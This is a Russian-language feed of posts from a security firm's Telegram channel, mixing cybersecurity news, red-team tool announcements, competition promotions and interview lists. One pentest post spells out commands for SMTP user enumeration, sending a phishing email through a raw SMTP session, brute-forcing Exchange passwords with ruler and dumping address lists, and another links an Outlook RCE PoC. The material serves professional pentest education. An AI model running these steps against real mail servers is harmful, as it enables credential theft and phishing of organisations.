Лаборатория инновационных технологий и кибербезопасности. ( Laboratory of innovation technologies and cybersecurity ) Новости, события, мероприятия, технические обзоры Контактная информация: @ap_security_admin По вопросам сотрудничества: @P1N_C0DE
#pentest
📱 PoC Microsoft Outlook Remote Code Execution CVE-2024-21413
13 февраля 2024 года компания Microsoft выпустила предупреждение для своих пользователей о критической уязвимости в пакете Office, которая позволяет злоумышленникам удаленно выполнять вредоносный код.
Уязвимость затрагивает несколько продуктов Microsoft Office, включая приложения 365 Enterprise, Office 2016 и 2019, а также Office LTSC 2021.
➡️ PoC на данную уязвимость: https://blog.injectexp.dev/outlook-cve-2024-21413-for-rce-hacking-through-a-letter/07/rce/
В строке 27 необходимо указать путь к файлу на вашем сервере. В описании к скрипту имеются комментарии.
Об уязвимости: https://habr.com/ru/articles/798759/
#byapsecurity
🐦 Студенческий опыт Standoff — на шаг ближе к вершинам 🥇
Привет!!! Не так давно стажёры лаборатории инновационных технологий и кибербезопасности нашей компании принимали участие во Всероссийской студенческой кибербитве. Изюминкой тех соревнований являлся полигон Standoff, предоставленный студентам для получения первичных навыков участия в этих захватывающих кибербитвах.
⚡️ 8-10 сентября эти захватывающие соревнования пройдут вновь. Вся информация представлена по ссылке.
Надеемся, что печатный труд ребят ( за что им отдельная благодарность) поможет Вам раскрыть потенциал и реализовать свои цели - принять участие в сражениях Государства F в роли атакующих или защитников🔥
Приятного прочтения ✈️
#tools #redteam
🎨 ProtectMyTooling
Скрипт, который объединяет множество упаковщиков, обфускаторов, загрузчиков шеллкода, кодировщиков для создания сложных защищенных имплантатов Red Team. Ваш идеальный компаньон в CI/CD конвейере разработки ПО, помогающий ставить водяные знаки на ваши артефакты, собирать IOC и многое другое.
#pentest
📱System32 для выполнения атак.
Каталог System32 - это критический компонент операционной системы Windows, в котором хранятся важные системные файлы и библиотеки, необходимые для работы системы.
В контексте наступательной безопасности этот каталог имеет большое значение, поскольку содержит исполняемые файлы и сценарии, которые можно использовать как для администрирования системы, так и для вредоносных целей.
Приятного прочтения 👌
#byapsecurity
🔥 Наверняка уже не раз Вы встречались с работами нашего исследователя безопасности.
AFANX, автор статей на Хакер "Беззащитная защита. Изучаем уязвимость, дающую встроить бэкдор в FortiGate", "Гид по реверсу.Тренируемся анализировать бинарные файлы на примере libexif" и далеко не только этих работ, по истине энтузиаст и специалист своего дела завёл свой канал-блог, где делится отличительной атмосферой и собственными работами.
📲Подписывайтесь на канал и прокачивайте свои навыки в области реверса и pwn.💡
#soc #beginners
👋 Интервью SOC L1
Путь специалиста по информационной безопасности насыщен и разнообразен.
🔵В приведённом файле обозначены вопросы с интервью на позиции аналитика.
Успехов в начинаниях👍
#soc
🪆 APT 40
APT 40 действует по крайней мере с 2011 года, в первую очередь нацеленная на правительственные организации и ключевые частные предприятия в США и Австралии. Они быстро используют новые публично раскрытые уязвимости и развертывают веб-оболочки для обеспечения доступа. Их атаки включают сетевую разведку, использование уязвимостей, подобных тем, что есть в Log4J, и кражу данных через серверы управления и контроля (C2).
В следующем файле представлены основные техники и тактики этой группировки.
#itnews #infosec
⚡️Мошенническая кампания нацелена на россиян, собирающихся посетить олимпийские игры
Широкая сеть из 708 мошеннических веб-доменов используется для продажи поддельных билетов на спортивные и музыкальные мероприятия, в первую очередь русскоязычной аудитории, по данным провайдера QuoIntelligence, занимающегося анализом угроз.
На двух из этих доменов, "ticket-paris24 [.]com" и "tickets-paris24 [.] com", размещены убедительные веб-сайты, которые, по-видимому, позволяют пользователям приобретать билеты на предпочитаемые ими мероприятия во время предстоящих летних Олимпийских игр и выбирать жилье в Париже.
📲 Телеграм-боты доставляют пользователям СМС-стилеры для перехвата кодов 2FA
Специалисты Positive Technologies предупреждают об активности киберпреступников, использующих Telegram в качестве командного центра (C2). В частности, исследователи выявили в мессенджере более тысячи ботов, использующих СМС-стилеры для перехвата кодов аутентификации. Как отмечают в Positive Technologies, телеграм-боты имеют индонезийское происхождение. Статистика по регионам, в которых вредонос был загружен на устройство, говорит о том, что атакующие охотятся в том числе на жителей России и Белоруссии.
Как правило, жертва получает сообщение с вложенным файлом APK. Не обращая внимания на расширение, пользователь скачивает этот файл, в результате чего на его мобильное устройство устанавливается СМС-стилер. Задача
последнего — перехватывать коды аутентификации, которые откроют злоумышленникам доступ к банковскому аккаунту жертвы.
Пока в России и Белоруссии встречались только единичные случаи заражения, а основная масса пришлась на жителей Индонезии.
🏋️ Разработчики Signal после критики усилят безопасность настольного клиента и изменят способ хранения ключей шифрования
Разработчики Signal после критики со стороны профильных экспертов и пользователей согласились усилить безопасность настольного клиента мессенджера и изменить способ хранения ключей шифрования. В настоящее время Signal хранит ключи шифрования на ПК в виде обычного текста (plaintext), что потенциально подвергает пользователей риску кражи данных в случае компрометации системы.
«Помимо перехода к зашифрованным/поддерживаемым хранилищем ключей ключам шифрования локальной базы данных на поддерживаемых платформах, наша новая реализация защиты также включает в себя некоторые дополнительные
шаги по устранению неполадок и временный запасной вариант, который позволит пользователям восстановить свою базу данных сообщений, используя свой устаревший ключ шифрования базы данных, если что-то пойдет не так», — объяснил СМИ разработчик Signal Джейми Кайл.
Готовы сразиться за кибербезопасность города N?
8-10 сентября в Казани — ТРЕТЬЯ ВСЕРОССИЙСКАЯ СТУДЕНЧЕСКАЯ КИБЕРБИТВА
Попробуй себя в роли настоящего хакера или киберзащитника!
Кибербитва — это всероссийское ИБ-соревнование, где команды из ведущих вузов могут испытать свои силы в условиях, максимально приближенных к реальности.
Команда красных будет реализовывать кибератаки на инфраструктуру, а синие — выявлять инциденты ИБ.
Требования к участникам:
🟠Студенты или аспиранты вузов
🟠Опыт в прошлых кибербитвах или CTF-соревнованиях
🟠Сложившиеся команды от 5 до 10 человек
🟠Интерес к ИТ и кибербезопасности
Собери команду единомышленников, регистрируйся на сайте кибербитвы и проходи экспертный отбор от ведущих специалистов России.
Задача Innostage — дать будущим ИБ-специалистам площадку, где они на практике могут испытать свои силы. Лучшие игроки кибербитвы получают шанс запомниться судьям и присоединиться к топовым ИБ-компаниям России.
Призовой фонд кибербитвы — 200 000 рублей.
Регистрация команд продлена до 28 июля. Количество мест ограничено, так что поторопитесь!
ПРИНЯТЬ УЧАСТИЕ
#redteam
👌 Shellcode-Loader
Этот свежий сценарий PowerShell демонстрирует продвинутые техники, включая внедрение шелл-кода, динамический вызов функций и обфускацию сценария PowerShell.
#osint
🥝 OSINT от а до я
Большая коллекция материалов для тех, кто желает развивать свои навыки поиска по открытым источникам.
Репозиторий содержит советы, с чего начать, практические кейсы и тренировочные площадки.
#itnews #infosec
⚡️Плагины WordPress подвержены риску из-за компрометации библиотеки Polyfill
В рекомендациях упоминается атака на цепочку поставок Polyfill, о которой Sansec первоначально сообщила 25 июня. Эта атака нацелена на Polyfill.js, широко используемую библиотеку JavaScript, которая обеспечивает современные функциональные возможности в старых веб-браузерах, не имеющих встроенной поддержки.
Вредоносный код JavaScript был внедрен в библиотеку, размещенную на этом домене, что создает серьезные риски, такие как угрозы межсайтового скриптинга (XSS). Эти уязвимости потенциально могут скомпрометировать пользовательские данные и перенаправлять посетителей на вредоносные веб-сайты
🤜«Эльбрус» раскрывает секреты: новая эра российских процессоров начинается с открытого кода
В новую эпоху разработки российских процессоров «Эльбрус» входит с открытой дверью. МЦСТ объявил о начале новой стратегии взаимодействия с отечественным и международным разработчиками, раскрывая исходные коды ядра Linux, системных библиотек и специализированных патчей для архитектуры «Эльбрус». Это шаг, как заявляет заместитель генерального директора по маркетингу Константин Трушкин, направлен на сотрудничество и развитие открытых технологий, которые будут способствовать адаптации ПО под особенности данной платформы.
🐦 Pentest award продлевает прием заявок до 14 июля
В качестве призов финалисты получат: умные колонки и подарки от партнеров проекта VK Bug Bounty, билеты на конференцию OFFZONE, традиционные гранты на обучение на любых курсах CyberED и, конечно, эксклюзивные именные статуэтки Pentest award.
Церемония награждения Pentest award пройдет 2 августа 2024 года в Москве.
#pentest #tools
💬 WiFi Rubber Ducky
Rubber Ducky — известное хакерское устройство, известное специалистам по информационной безопасности и фанатам того самого сериала Mr. Robot.
Atom Ducky - это HID-устройство (human interface device), управляемое через веб-браузер. Оно предназначено для работы в качестве беспроводного Rubber Ducky, персонального аутентификатора или клавиатуры.
Его основная цель - помочь этичным хакерам получить знания об устройствах Rubber Ducky и интегрировать их использование в повседневную жизнь.
➡️ Познакомиться с миром Rubber Ducky можно в статье Флешка Rubber Ducky стала ещё опаснее
#pentest #beginners
📎 Вопросы к собеседованию на позицию пентестера
Порядка 60 разделов, содержащих по несколько вопросов, ждут Вас по ссылке ниже.
✏️Хороший свежий чек-лист для начинающих специалистов, только- только планирующих начать свой профессиональный путь в рядах атакующих.
А с известной похожей русскоязычной подборкой можно ознакомиться по ссылке.
📱 GitHub
#itnews #infosec
⚠️ Пользователи Android предупредили о растущей угрозе вредоносного ПО Rafel RAT
Исследователи безопасности предостерегли людей от трояна Rafel, инструмента удаленного доступа с открытым исходным кодом (RAT), предназначенного для устройств Android.
Собрав образцы вредоносного ПО и проанализировав около 120 C2, CPR определила Соединенные Штаты, Китай и Индонезию как наиболее пострадавшие страны. Большинство зараженных устройств были телефонами Samsung, за ними следовали Xiaomi, Vivo и Huawei.
📣 Власти могут упростить гражданам отказ от обработки персональных данных
Заместитель руководителя Роскомнадзора Милош Вагнер на сессии «Персональные данные — зона особого внимания» в рамках Петербургского международного юридического форума заявил, что граждане должны получить возможность «отзывать согласие на обработку персональных данных в один клик». Чиновник пояснил, что сейчас «большинство согласий далеко не в интересах человека и точно уж не осознанно им даются».
Инициатива Роскомнадзора может быть реализована через платформу управления согласиями на базе портала «Госуслуги», которую Минцифры анонсировало весной, считает знакомый с ситуацией источник “Ъ”. В марте в министерстве отмечали, что для полного запуска платформы в личном кабинете на «Госуслугах» нужны законодательные изменения, которые сейчас прорабатываются. К сервису подключены 280 организаций, из них 150 — финансовые, 76 — МФЦ и 43 — образовательные. Предполагается, что технология будет расширена на другие отрасли, говорит собеседник “Ъ”. В Минцифры на запрос не ответили.
🏝 «Лаборатория Касперского» открыла приём заявок для спикеров на Kaspersky Industrial Cybersecurity Conference
«Лаборатория Касперского» открыла приём заявок на выступление на Kaspersky Industrial Cybersecurity Conference. Конференция будет проходить с 25 по 27 сентября в ставшем уже традиционным месте — городе Сочи.
#osint
🔍Удивительный OSINT
Этот насыщенный список инструментов создан помочь всем, кто занимается Cyber Threat Intellience (CTI), охотой за угрозами или осинтом. Ресурс полезен от начинающих специалистов до продвинутых.
#realcase
🖥 Что должно измениться, чтобы утечек стало меньше
Ассоциация больших данных (ее членами являются «Яндекс», VK, Сбербанк, Газпромбанк, Тинькофф Банк, Россельхозбанк, «Мегафон», «Ростелеком», Qiwi, билайн, МТС, фонд «Сколково», Аналитический центр при правительстве Российской Федерации, ВТБ, Avito, Центр стратегических разработок) предложила депутатам уточнить текст поправок в Уголовный кодекс, ужесточающих наказание за утечки данных и устанавливающих для нарушителей даже уголовную ответственность за сбор или хранение незаконно полученных персональных данных. Об этом говорится в письме ассоциации от 26 декабря 2023 года в комитет Госдумы по госстроительству и законодательству.
🔩 Данная дискуссия широко описывает проблемы регулирования ответственности за утечки персональных данных, от рисков для бизнеса до юридических ограничений. Обсуждается предложенный АБД стандарт в области защиты персональных данных, опробованный крупными игроками рынка.
Приятного просмотра 🌟
#soc
✏️ VasyGrek and Mr.Burns
Как выяснили в F.A.C.C.T., атакующая российские компании группировка VasyGrek активна как минимум с 2016 года. В погоне за бизнес-аккаунтами ДБО злоумышленники используют коммерческих инфостилеров и RAT, в том числе творения вирусописателя Mr.Burns.
Эксперты FACCT проанализировали инструменты и связи киберпреступников, атакующих российских бухгалтеров.
Приятного прочтения👁
Атакуем корпоративную почту ☄️
Часто при пентесте возникает ситуация, когда при скане портов можно наткнуться на открытый 25 порт, на котором висит SMTP сервер, но что же можно с этим поделать?
Самым первым действием можно попробовать просто подключиться к самому серверу
nc -vn ip 25
pip install smtp-user-enum
smtp-user-enum -U /usr/share/wordlists/users.txt mail.example.tld 25
smtp-user-enum -m EXPN -U /usr/share/wordlists/users.txt mail.example.tld 25
smtp-user-enum -m RCPT -U /usr/share/wordlists/users.txt mail.example.tld 25
msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) set RHOSTS <IP address/target>
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) set USER_FILE <address of file>
msf auxiliary(smtp_enum) run
MAIL FROM: support@domain.com
250 ok
RCPT TO: user@domain.com
250 ok
data
354 End data with <CR><LF>.<CR><LF>
SUBJECT: Тема письма
фишинговый текст
. (ставится с новой строки, чтобы закончить текст письма)
250 ok
sudo python3 get_exchange_version.py https://mail.target.com
wget https://github.com/sensepost/ruler/releases/download/2.4.1/ruler-linux64
chmod +x ruler-linux64
./ruler-linux64 --domain domain.com brute --users usernames.txt --passwords passwords.txt
./ruler-linux64 --email user@targetdomain.com abk dump --output /tmp/gal.txtЧитать полностью…
#byapsecurity
🌟Мнение пентестера AP Security об обучении на отечественных курсах.
Вот и подошёл к концу увлекательный путь прохождения курса «Анализ защищенности инфраструктуры на основе технологий Active Directory» от RalfHacker (Автор известной книги "Active Directory глазами хакера") и Павла Никитина. Мы учились первым потоком и отработали всё на твёрдую пятёрку.
В нашей компании есть хорошая практика регулярно повышать свою квалификацию, а в связи с уходом многих зарубежных сертификаций с рынка отличной возможностью стало попробовать отечественные наработки. К тому же я давно пытался освоить тему внутреннего пентеста прочтениями разных циклов статей, например от zer1to , прохождением лабораторных по типу GOAD. Но это большого успеха не приносило, это всё не структурировано, нет отработки большинства тем на практике, нет передачи накопленного опыта на реальных практических кейсах и учениях.
Реальное понимание и подход к похеку внутрянки я приобрёл за эти 3 месяца. После прохождения курса у меня появилась отличная база заметок по каждой тактике и технике, применяемой на пентесте, не удивительно, к каждому уроку были подготовлены методички ( примерно 30 страниц на каждом уроке ), видео прохождения лабороторной на отработку всех техник и Домашнее задание, на решение которого уходило 2-3 вечера после работы. К тому же появилась целая заметка тем, которые дополнительно стоит изучить, так сказать down the rabbit hole. Я справлялся почти всегда в сроки, в общей сложности я сделал 16 домашних заданий и сдал экзамен без больших трудностей, учитывая, что раньше я только несколько работал с атаками на домен во время пентестов, в основном я ломал веб, занимался разработкой и был уверенным игроком в ctf.
Крутым моментом стало освещение огромного количества утилит под различные платформы, теперь я точно не растеряюсь если мне нужно будет релеить хеши на виндовом хосте. Огромное количество методов повышения привилегий , сбора УД, закрепления, туннелирование, обходов UAC, AMSI, ретрансляционные атаки, атаки на доверительные отношения, службы сертификации, делегирование, работа с C2 и это не весь список тем с которыми вам придётся столкнуться.
Подводя итог, хочется сказать только одно - огромное спасибо Мише и Паше за Лучший курс по внутрянке в стране, а может быть и в мире(кто знает..)
#tools #redteam
🖥 Top C&C Methods
Большая коллекция инструментов и ресурсов С2, LOLBins, а также набор команд curl для работы с Dropbox, Yandex ,Telegram и прочими известными сервисами.
#pentest #tools
😖 Captcha Bypass
Этот новый проект представляет собой CLI-инструмент для тестирования различных типов капч, таких как головоломки, тексты, reCAPTCHA.
Инструмент написан на Python и использует OpenAI GPT-4 для решения капч.
💻Для своих — ВСКБ
На Positive Hack Days 2 команды Positive Technologies и Innostage совместно организовали одно из крутейших ИБ-соревнований сейчас — Всероссийскую студенческую кибербитву.
Главным новшеством на студенческой кибербитве в этом году стало участие красных (атакующих) команд, а также инфраструктура, максимально приближенная к той, которую лучшие белые хакеры исследовали на кибербитве Standoff 13. За этими новациями стояла команда Positive Technologies — эксперты Standoff и направления Positive Education.
Несмотря на достаточно большой багаж теоретических знаний, студентам направлений информационной безопасности часто не хватает профильной практики. По сравнению с прошлой ВСКБ в Казани на Kazan Digital Week в Innostage усилили процесс подготовки команд: в течение полутора месяцев проводили встречи и тренировочные сессии с будущими участниками кибербитвы со стороны защитников.
Более подробно об этом крупномасштабном событии можно почитать в следующей статье.
✅ Если ты студент или аспирант вуза и хочешь ощутить всю атмосферу этого мероприятия, то обязательно регистрируйся вместе с командой на третью всероссийскую студенческую кибербитву ( подробную информацию можно найти в посте выше).
🌟Успехов в битве и удачи на профессиональном пути!
#realcase #soc
📱От стажера до CISO в крупной компании за шесть лет: что нужно знать и уметь молодому руководителю
О нюансах работы CISO действительно существует большое количество мнений и споров.
Каждый руководитель действительно уникален по своему и в данный доклад отражает особенность этой должности как элемента топ- менеджмента компании.
Какие качества необходимы, технические навыки, подход к работе и смежные с этим всем вопросы Вы узнаете в следующем докладе.
🌟Приятного просмотра
#soc
📖 Security lists for SOC/CERT/CTI
Огромный ресурс, обновляющийся в течение последних нескольких дней, даёт широкую базу рекомендаций в работе для специалистов разного профиля синих команд.
📔Приятного просмотра
Привет 👋, ты на канале компании AP Security, интегратора услуг информационной безопасности.
Меня зовут B0zm4n, и я талисман лаборатории инновационных технологий и кибербезопасности.
Располагайся поудобнее, я расскажу тебе, как у меня всё устроено ☕️
/channel/ap_security_chat - чат канала, где можно пообщаться с комьюнити на интересующие вопросы (главное не стесняться)
#apt - посты, связанные с APT-группировками
#soc - утилиты и полезные рекомендации для SOC
#redteam - статьи и материалы для RedTeam
#pentest - все, что связано с пентестом
#tools - полезные утилиты для Blue и Red Team, а также скрипты для автоматизации
#osint - все, что связано с OSINT-ом
#byapsecurity - уникальный контент, сделанный командой AP Security
#cve , #exploit - новые эксплойты и актуальные CVE
#web - Bug Bounty и Web-эксплуатация
#beginners - для самых маленьких
#windows , #linux - уязвимости и техники для ОС Windows и Linux
#fuzzing , #reverse - фаззинг, реверс, PWN
#activedirectory - утилиты и техники, касающиеся взлома AD
#cheatsheet - полезные подсказки и шпаргалки
#malware , #hackers - ВПО и деятельность хакерских группировок
#forensics - цифровая криминалистика
#application - материалы из области безопасной разработки
#realcase - реальные кейсы из практики специалистов
➡️ Если ты хочешь стать частью нашего коллектива, пообщаться с представителями лаборатории, либо же обсудить сотрудничество, то мы с радостью ответим по следующим адресам 📞:
@ap_security_admin
zdm@apsecurity.ru
Я очень рад, что мы познакомились🔥 Не забывай поставить уведомление о новых постах!
With love, B0zm4n😏
🔝 Четверг - время вдохновиться на завершение рабочей недели
Продуктовый подход — это короткий цикл, в рамках которого весь фокус специалиста, предпринимателя или product-менеджера направлен на продукт. При реализации этого цикла важно действовать быстро и использоваться в качестве вводных метрики и обратную связь клиентов. Эти данные помогают подобрать или придумать ключевое действие, которое можно сделать с продуктом.
В качестве продукта может выступать все, что угодно. Это может быть бизнес, карьера, личное время, финансовая грамотность. Например, если речь идет о личном времени, важно смотреть на собственную эффективность: сколько проектов и личных дел получается сделать за единицу времени. Если рассматривать финансовую грамотность, нужно делать акцент на накопления, возможный прирост капитала и так далее.
Метрика любого продукта помогает генерировать гипотезы и получать обратную связь от клиентов, стейкхолдеров, сотрудников или самого себя. Ответная реакция поможет понять, как можно улучшить продукт.
✅ Дмитрий Гадарь в своём докладе рассказывает о том, как этот подход применяется в банковской сфере и предлагает слушателям расширить своё видение на построение безопасности Вашей компании.
Приятного просмотра✈️
#soc
✅ Incident Response Guide
В этом руководстве подробно рассказывается о том, как правильно реагировать на инциденты кибербезопасности.
В нем Вы найдете практические советы о том, как быстро и эффективно подготовиться к возможному инциденту, отреагировать на него и принять последующие меры.
Гайд предназначен для того, чтобы Вы могли определить, что означает инцидент кибербезопасности для Вашей организации, создать фундамент для реализации реагирования на инциденты кибербезопасности.
📔Приятного прочтения
#cheatsheet
📱 Powershell cheatsheet
Шпаргалка по PowerShell - краткое, но удобное руководство по работе с расширенной командной оболочкой как для новичков, так и для опытных администраторов. Во второй половине файла представлено описание команд для пентестеров.
#realcase #pentest
📱 Маленькие большие коробочки
Обзорный доклад о тестировании внешнего периметра. Маленькие коробочки - наши домашние устройства, коробочки побольше - коммутационное офисное оборудование.
Приведено много статистики уязвимых торчащих наружу устройств, прогнозы по атакам на отечественные сетевые решения. А также интересное обсуждение законности сканирования Интернета, комментарии выступающих по этому поводу.
Краткую выжимку о маленьких коробочках можно почитать здесь.
Приятного просмотра ✅